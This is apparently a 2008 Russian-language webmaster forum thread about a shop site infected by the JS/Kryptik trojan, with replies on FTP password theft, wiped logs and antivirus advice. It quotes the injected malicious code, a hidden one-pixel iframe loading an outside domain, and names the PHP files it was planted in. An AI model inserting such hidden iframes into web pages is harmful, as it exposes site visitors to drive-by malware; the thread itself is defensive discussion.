Вирусы SS методы борьбы с ними

jujik · 14 Дек 2008

Думаю тема будет актуальной для всех

Добавлено через 5 минут
Сразу и размочим ее =)
Ребята 13.12.2008 мне закинули троян JS/Kryptik в магазин
он формирует в самом верху ссылку вида

PHP:

<iframe src=\"http://thedeadpit.com/?click=ХХХХХХХ\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>

прописывается в файликах index.php i smarty/plugins/modifier.default.php

у меня что-то подобное было пол года, в другом магазине.
кто сталкивался отпишитесь плз!

Добавлено через 7 минут
п.с. в логах никакого криминала =(

RxB · 14 Дек 2008

Подобные темы поднимаются раз в две недели стабильно:
Для просмотра ссылки Войди или Зарегистрируйся
Для просмотра ссылки Войди или Зарегистрируйся

sounde · 14 Дек 2008

jujik написал(а):
п.с. в логах никакого криминала =(

Как пишут в темах по вышеданным ссылках трояны трут все логи

( так что это нормально видимо, что логи "чистые".

shkiper · 14 Дек 2008

а эту ссылку видно при простом пользовательском просмотре сайта или только через код?

jujik · 14 Дек 2008

shkiper написал(а):
а эту ссылку видно при простом пользовательском просмотре сайта или только через код?

конечно видно =)) на всех страницах сверху (см. HTML)

Добавлено через 5 минут

Цитируем FAQ:

Если при заходе на Ваш сайт антивирус говорит, что он обнаружил вирус - это значит что файлы Вашего сайта были модифицированы.

В последнее время в интернете появился вирус, который попав на компьютер делает следующее:
- перехватывает все пароли FTP
- передает эти данные скрипту, который зайдя на FTP меняет все индексные файлы, добавляя в код страницы строчки со ссылкой на вирус. И таким образом открывая сайт можно заразится вирусом.
Мы настоятельно рекомендуем использовать только хорошее программное обеспечение, во избежание таких проблем.
После того как Вы вылечите систему, Вам следует обязательно сменить Ваши пароли на вход в Вашу панель управления, FTP, Почту, Базы данных. Скрипт их уже украл.
После, во всех скриптах (которые заражены) убрать лишние строчки, или заменить их с резервных копий.

Действительно, я работаю с двух компьютеров, один чистый, а на другом уже куча вирусов оказалось =)))
По теме, ещё нашол что в основном у тех такие проблемы кто пользуется Total Commander для работы с сайтом через фтп. Я пользуюсь тоталом

RxB · 14 Дек 2008

Пароли в тотале не храни и будет тебе счастье.

13zone · 14 Дек 2008

поставь антивирь с сетевым экраном + хайд открытых портов или файрволл и обновляй базы каждые 2-3 дня

warsoul · 17 Дек 2008

хорошо все же иногда антивирь юзать

Вирусы SS методы борьбы с ними

jujik

Создатель

RxB

Гуру форума

sounde

Гуру форума

shkiper

Полезный

jujik

Создатель

RxB

Гуру форума

13zone

Профессор

warsoul

Писатель